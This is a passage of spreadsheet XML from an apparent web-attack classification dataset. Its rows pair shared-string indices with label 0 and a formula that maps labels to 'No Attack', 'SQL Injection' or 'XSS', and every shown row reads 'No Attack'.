    <row r="27419" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27419" s="1" t="s">
        <v>36599</v>
      </c>
      <c r="B27419">
        <v>0</v>
      </c>
      <c r="C27419" s="7" t="str">
        <f t="shared" si="428"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27420" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27420" s="1" t="s">
        <v>26918</v>
      </c>
      <c r="B27420">
        <v>0</v>
      </c>
      <c r="C27420" s="7" t="str">
        <f t="shared" si="428"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27421" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27421" s="1" t="s">
        <v>36725</v>
      </c>
      <c r="B27421">
        <v>0</v>
      </c>
      <c r="C27421" s="7" t="str">
        <f t="shared" si="428"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27422" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27422" s="1" t="s">
        <v>31525</v>
      </c>
      <c r="B27422">
        <v>0</v>
      </c>
      <c r="C27422" s="7" t="str">
        <f t="shared" si="428"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27423" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27423" s="1" t="s">
        <v>22526</v>
      </c>
      <c r="B27423">
        <v>0</v>
      </c>
      <c r="C27423" s="7" t="str">
        <f t="shared" si="428"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27424" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27424" s="1" t="s">
        <v>36496</v>
      </c>
      <c r="B27424">
        <v>0</v>
      </c>
      <c r="C27424" s="7" t="str">
        <f t="shared" si="428"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27425" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27425" s="1" t="s">
        <v>23336</v>
      </c>
      <c r="B27425">
        <v>0</v>
      </c>
      <c r="C27425" s="7" t="str">
        <f t="shared" si="428"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27426" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27426" s="1" t="s">
        <v>23383</v>
      </c>
      <c r="B27426">
        <v>0</v>
      </c>
      <c r="C27426" s="7" t="str">
        <f t="shared" si="428"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27427" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27427" s="1" t="s">
        <v>23973</v>
      </c>
      <c r="B27427">
        <v>0</v>
      </c>
      <c r="C27427" s="7" t="str">
        <f t="shared" si="428"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27428" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27428" s="1" t="s">
        <v>32471</v>
      </c>
      <c r="B27428">
        <v>0</v>
      </c>
      <c r="C27428" s="7" t="str">
        <f t="shared" si="428"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27429" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27429" s="1" t="s">
        <v>24149</v>
      </c>
      <c r="B27429">
        <v>0</v>
      </c>
      <c r="C27429" s="7" t="str">
        <f t="shared" si="428"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27430" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27430" s="1" t="s">
        <v>20508</v>
      </c>
      <c r="B27430">
        <v>0</v>
      </c>
      <c r="C27430" s="7" t="str">
        <f t="shared" si="428"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27431" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27431" s="1" t="s">
        <v>23986</v>
      </c>
      <c r="B27431">
        <v>0</v>
      </c>
      <c r="C27431" s="7" t="str">
        <f t="shared" si="428"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27432" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27432" s="1" t="s">
        <v>22379</v>
      </c>
      <c r="B27432">
        <v>0</v>
      </c>
      <c r="C27432" s="7" t="str">
        <f t="shared" si="428"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27433" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27433" s="1" t="s">
        <v>22510</v>
      </c>
      <c r="B27433">
        <v>0</v>
      </c>
      <c r="C27433" s="7" t="str">
        <f t="shared" si="428"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27434" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27434" s="1" t="s">
        <v>22768</v>
      </c>
      <c r="B27434">
        <v>0</v>
      </c>
      <c r="C27434" s="7" t="str">
        <f t="shared" si="428"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27435" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27435" s="1" t="s">
        <v>36650</v>
      </c>
      <c r="B27435">
        <v>0</v>
      </c>
      <c r="C27435" s="7" t="str">
        <f t="shared" si="428"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27436" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27436" s="1" t="s">
        <v>33634</v>
      </c>
      <c r="B27436">
        <v>0</v>
      </c>
      <c r="C27436" s="7" t="str">
        <f t="shared" si="428"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27437" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27437" s="1" t="s">
        <v>27324</v>
      </c>
      <c r="B27437">
        <v>0</v>
      </c>
      <c r="C27437" s="7" t="str">
        <f t="shared" si="428"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27438" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27438" s="1" t="s">
        <v>30281</v>
      </c>
      <c r="B27438">
        <v>0</v>
      </c>
      <c r="C27438" s="7" t="str">
        <f t="shared" si="428"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27439" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27439" s="1" t="s">
        <v>21925</v>
      </c>
      <c r="B27439">
        <v>0</v>
      </c>
      <c r="C27439" s="7" t="str">
        <f t="shared" si="428"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27440" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27440" s="1" t="s">
        <v>34963</v>
      </c>
      <c r="B27440">
        <v>0</v>
      </c>
      <c r="C27440" s="7" t="str">
        <f t="shared" si="428"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27441" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27441" s="1" t="s">
        <v>21608</v>
      </c>
      <c r="B27441">
        <v>0</v>
      </c>
      <c r="C27441" s="7" t="str">
        <f t="shared" si="428"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27442" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27442" s="1" t="s">
        <v>32586</v>
      </c>
      <c r="B27442">
        <v>0</v>
      </c>
      <c r="C27442" s="7" t="str">
        <f t="shared" si="428"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27443" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27443" s="1" t="s">
        <v>29610</v>
      </c>
      <c r="B27443">
        <v>0</v>
      </c>
      <c r="C27443" s="7" t="str">
        <f t="shared" si="428"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27444" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27444" s="1" t="s">
        <v>33810</v>
      </c>
      <c r="B27444">
        <v>0</v>
      </c>
      <c r="C27444" s="7" t="str">
        <f t="shared" si="428"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27445" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27445" s="1" t="s">
        <v>34492</v>
      </c>
      <c r="B27445">
        <v>0</v>
      </c>
      <c r="C27445" s="7" t="str">
        <f t="shared" si="428"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27446" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27446" s="1" t="s">
        <v>21424</v>
      </c>
      <c r="B27446">
        <v>0</v>
      </c>
      <c r="C27446" s="7" t="str">
        <f t="shared" si="428"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27447" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27447" s="1" t="s">
        <v>20058</v>
      </c>
      <c r="B27447">
        <v>0</v>
      </c>
      <c r="C27447" s="7" t="str">
        <f t="shared" si="428"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27448" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27448" s="1" t="s">
        <v>10039</v>
      </c>
      <c r="B27448">
        <v>0</v>
      </c>
      <c r="C27448" s="7" t="str">
        <f t="shared" si="428"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27449" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27449" s="1" t="s">
        <v>30177</v>
      </c>
      <c r="B27449">
        <v>0</v>
      </c>
      <c r="C27449" s="7" t="str">
        <f t="shared" si="428"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27450" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27450" s="1" t="s">
        <v>23557</v>
      </c>
      <c r="B27450">
        <v>0</v>
      </c>
      <c r="C27450" s="7" t="str">
        <f t="shared" si="428"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27451" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27451" s="1" t="s">
        <v>26956</v>
      </c>
      <c r="B27451">
        <v>0</v>
      </c>
      <c r="C27451" s="7" t="str">
        <f t="shared" si="428"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27452" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27452" s="1" t="s">
        <v>34194</v>
      </c>
      <c r="B27452">
        <v>0</v>
      </c>
      <c r="C27452" s="7" t="str">
        <f t="shared" si="428"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27453" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27453" s="1" t="s">
        <v>36005</v>
      </c>
      <c r="B27453">
        <v>0</v>
      </c>
      <c r="C27453" s="7" t="str">
        <f t="shared" si="428"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27454" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27454" s="1" t="s">
        <v>32692</v>
      </c>
      <c r="B27454">
        <v>0</v>
      </c>
      <c r="C27454" s="7" t="str">
        <f t="shared" si="428"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27455" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27455" s="1" t="s">
        <v>22405</v>
      </c>
      <c r="B27455">
        <v>0</v>
      </c>
      <c r="C27455" s="7" t="str">
        <f t="shared" si="428"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27456" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27456" s="1" t="s">
        <v>31705</v>
      </c>
      <c r="B27456">
        <v>0</v>
      </c>
      <c r="C27456" s="7" t="str">
        <f t="shared" si="428"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27457" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27457" s="1" t="s">
        <v>37254</v>
      </c>
      <c r="B27457">
        <v>0</v>
      </c>
      <c r="C27457" s="7" t="str">
        <f t="shared" si="428"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27458" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27458" s="1" t="s">
        <v>34786</v>
      </c>
      <c r="B27458">
        <v>0</v>
      </c>
      <c r="C27458" s="7" t="str">
        <f t="shared" si="428"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27459" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27459" s="1" t="s">
        <v>22471</v>
      </c>
      <c r="B27459">
        <v>0</v>
      </c>
      <c r="C27459" s="7" t="str">
        <f t="shared" ref="C27459:C27522" si="429">IF(B27459=0,"No Attack", IF(B27459=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27460" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27460" s="1" t="s">
        <v>29935</v>
      </c>
      <c r="B27460">
        <v>0</v>
      </c>
      <c r="C27460" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27461" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27461" s="1" t="s">
        <v>24176</v>
      </c>
      <c r="B27461">
        <v>0</v>
      </c>
      <c r="C27461" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27462" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27462" s="1" t="s">
        <v>35338</v>
      </c>
      <c r="B27462">
        <v>0</v>
      </c>
      <c r="C27462" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27463" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27463" s="1" t="s">
        <v>27121</v>
      </c>
      <c r="B27463">
        <v>0</v>
      </c>
      <c r="C27463" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27464" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27464" s="1" t="s">
        <v>32790</v>
      </c>
      <c r="B27464">
        <v>0</v>
      </c>
      <c r="C27464" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27465" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27465" s="1" t="s">
        <v>21573</v>
      </c>
      <c r="B27465">
        <v>0</v>
      </c>
      <c r="C27465" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27466" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27466" s="1" t="s">
        <v>27236</v>
      </c>
      <c r="B27466">
        <v>0</v>
      </c>
      <c r="C27466" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27467" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27467" s="1" t="s">
        <v>23131</v>
      </c>
      <c r="B27467">
        <v>0</v>
      </c>
      <c r="C27467" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27468" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27468" s="1" t="s">
        <v>32386</v>
      </c>
      <c r="B27468">
        <v>0</v>
      </c>
      <c r="C27468" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27469" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27469" s="1" t="s">
        <v>21434</v>
      </c>
      <c r="B27469">
        <v>0</v>
      </c>
      <c r="C27469" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27470" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27470" s="1" t="s">
        <v>34628</v>
      </c>
      <c r="B27470">
        <v>0</v>
      </c>
      <c r="C27470" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27471" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27471" s="1" t="s">
        <v>27643</v>
      </c>
      <c r="B27471">
        <v>0</v>
      </c>
      <c r="C27471" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27472" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27472" s="1" t="s">
        <v>30417</v>
      </c>
      <c r="B27472">
        <v>0</v>
      </c>
      <c r="C27472" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27473" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27473" s="1" t="s">
        <v>30248</v>
      </c>
      <c r="B27473">
        <v>0</v>
      </c>
      <c r="C27473" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27474" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27474" s="1" t="s">
        <v>30467</v>
      </c>
      <c r="B27474">
        <v>0</v>
      </c>
      <c r="C27474" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27475" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27475" s="1" t="s">
        <v>29895</v>
      </c>
      <c r="B27475">
        <v>0</v>
      </c>
      <c r="C27475" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27476" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27476" s="1" t="s">
        <v>22472</v>
      </c>
      <c r="B27476">
        <v>0</v>
      </c>
      <c r="C27476" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27477" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27477" s="1" t="s">
        <v>36565</v>
      </c>
      <c r="B27477">
        <v>0</v>
      </c>
      <c r="C27477" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27478" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27478" s="1" t="s">
        <v>31077</v>
      </c>
      <c r="B27478">
        <v>0</v>
      </c>
      <c r="C27478" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27479" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27479" s="1" t="s">
        <v>34812</v>
      </c>
      <c r="B27479">
        <v>0</v>
      </c>
      <c r="C27479" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27480" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27480" s="1" t="s">
        <v>31889</v>
      </c>
      <c r="B27480">
        <v>0</v>
      </c>
      <c r="C27480" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27481" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27481" s="1" t="s">
        <v>33516</v>
      </c>
      <c r="B27481">
        <v>0</v>
      </c>
      <c r="C27481" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27482" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27482" s="1" t="s">
        <v>27415</v>
      </c>
      <c r="B27482">
        <v>0</v>
      </c>
      <c r="C27482" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27483" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27483" s="1" t="s">
        <v>30893</v>
      </c>
      <c r="B27483">
        <v>0</v>
      </c>
      <c r="C27483" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27484" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27484" s="1" t="s">
        <v>37006</v>
      </c>
      <c r="B27484">
        <v>0</v>
      </c>
      <c r="C27484" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27485" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27485" s="1" t="s">
        <v>34345</v>
      </c>
      <c r="B27485">
        <v>0</v>
      </c>
      <c r="C27485" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27486" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27486" s="1" t="s">
        <v>20459</v>
      </c>
      <c r="B27486">
        <v>0</v>
      </c>
      <c r="C27486" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27487" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27487" s="1" t="s">
        <v>23794</v>
      </c>
      <c r="B27487">
        <v>0</v>
      </c>
      <c r="C27487" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27488" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27488" s="1" t="s">
        <v>29364</v>
      </c>
      <c r="B27488">
        <v>0</v>
      </c>
      <c r="C27488" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27489" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27489" s="1" t="s">
        <v>31419</v>
      </c>
      <c r="B27489">
        <v>0</v>
      </c>
      <c r="C27489" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27490" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27490" s="1" t="s">
        <v>27071</v>
      </c>
      <c r="B27490">
        <v>0</v>
      </c>
      <c r="C27490" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27491" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27491" s="1" t="s">
        <v>36174</v>
      </c>
      <c r="B27491">
        <v>0</v>
      </c>
      <c r="C27491" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27492" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27492" s="1" t="s">
        <v>37096</v>
      </c>
      <c r="B27492">
        <v>0</v>
      </c>
      <c r="C27492" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27493" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27493" s="1" t="s">
        <v>31593</v>
      </c>
      <c r="B27493">
        <v>0</v>
      </c>
      <c r="C27493" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27494" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27494" s="1" t="s">
        <v>22648</v>
      </c>
      <c r="B27494">
        <v>0</v>
      </c>
      <c r="C27494" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27495" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27495" s="1" t="s">
        <v>37372</v>
      </c>
      <c r="B27495">
        <v>0</v>
      </c>
      <c r="C27495" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27496" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27496" s="1" t="s">
        <v>34415</v>
      </c>
      <c r="B27496">
        <v>0</v>
      </c>
      <c r="C27496" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27497" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27497" s="1" t="s">
        <v>22467</v>
      </c>
      <c r="B27497">
        <v>0</v>
      </c>
      <c r="C27497" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27498" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27498" s="1" t="s">
        <v>35194</v>
      </c>
      <c r="B27498">
        <v>0</v>
      </c>
      <c r="C27498" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27499" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27499" s="1" t="s">
        <v>31020</v>
      </c>
      <c r="B27499">
        <v>0</v>
      </c>
      <c r="C27499" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27500" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27500" s="1" t="s">
        <v>20475</v>
      </c>
      <c r="B27500">
        <v>0</v>
      </c>
      <c r="C27500" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27501" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27501" s="1" t="s">
        <v>27421</v>
      </c>
      <c r="B27501">
        <v>0</v>
      </c>
      <c r="C27501" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27502" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27502" s="1" t="s">
        <v>34076</v>
      </c>
      <c r="B27502">
        <v>0</v>
      </c>
      <c r="C27502" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27503" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27503" s="1" t="s">
        <v>20159</v>
      </c>
      <c r="B27503">
        <v>0</v>
      </c>
      <c r="C27503" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27504" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27504" s="1" t="s">
        <v>37310</v>
      </c>
      <c r="B27504">
        <v>0</v>
      </c>
      <c r="C27504" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27505" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27505" s="1" t="s">
        <v>21726</v>
      </c>
      <c r="B27505">
        <v>0</v>
      </c>
      <c r="C27505" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27506" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27506" s="1" t="s">
        <v>28117</v>
      </c>
      <c r="B27506">
        <v>0</v>
      </c>
      <c r="C27506" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27507" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27507" s="1" t="s">
        <v>29512</v>
      </c>
      <c r="B27507">
        <v>0</v>
      </c>
      <c r="C27507" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27508" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27508" s="1" t="s">
        <v>27623</v>
      </c>
      <c r="B27508">
        <v>0</v>
      </c>
      <c r="C27508" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27509" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27509" s="1" t="s">
        <v>36860</v>
      </c>
      <c r="B27509">
        <v>0</v>
      </c>
      <c r="C27509" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27510" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27510" s="1" t="s">
        <v>35619</v>
      </c>
      <c r="B27510">
        <v>0</v>
      </c>
      <c r="C27510" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27511" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27511" s="1" t="s">
        <v>21288</v>
      </c>
      <c r="B27511">
        <v>0</v>
      </c>
      <c r="C27511" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27512" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27512" s="1" t="s">
        <v>32878</v>
      </c>
      <c r="B27512">
        <v>0</v>
      </c>
      <c r="C27512" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27513" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27513" s="1" t="s">
        <v>37379</v>
      </c>
      <c r="B27513">
        <v>0</v>
      </c>
      <c r="C27513" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27514" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27514" s="1" t="s">
        <v>27739</v>
      </c>
      <c r="B27514">
        <v>0</v>
      </c>
      <c r="C27514" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27515" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27515" s="1" t="s">
        <v>27189</v>
      </c>
      <c r="B27515">
        <v>0</v>
      </c>
      <c r="C27515" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27516" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27516" s="1" t="s">
        <v>30944</v>
      </c>
      <c r="B27516">
        <v>0</v>
      </c>
      <c r="C27516" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27517" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27517" s="1" t="s">
        <v>29124</v>
      </c>
      <c r="B27517">
        <v>0</v>
      </c>
      <c r="C27517" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27518" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27518" s="1" t="s">
        <v>23296</v>
      </c>
      <c r="B27518">
        <v>0</v>
      </c>
      <c r="C27518" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27519" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27519" s="1" t="s">
        <v>32990</v>
      </c>
      <c r="B27519">
        <v>0</v>
      </c>
      <c r="C27519" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27520" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27520" s="1" t="s">
        <v>29374</v>
      </c>
      <c r="B27520">
        <v>0</v>
      </c>
      <c r="C27520" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27521" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27521" s="1" t="s">
        <v>21062</v>
      </c>
      <c r="B27521">
        <v>0</v>
      </c>
      <c r="C27521" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27522" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27522" s="1" t="s">
        <v>27157</v>
      </c>
      <c r="B27522">
        <v>0</v>
      </c>
      <c r="C27522" s="7" t="str">
        <f t="shared" si="429"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27523" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27523" s="1" t="s">
        <v>22374</v>
      </c>
      <c r="B27523">
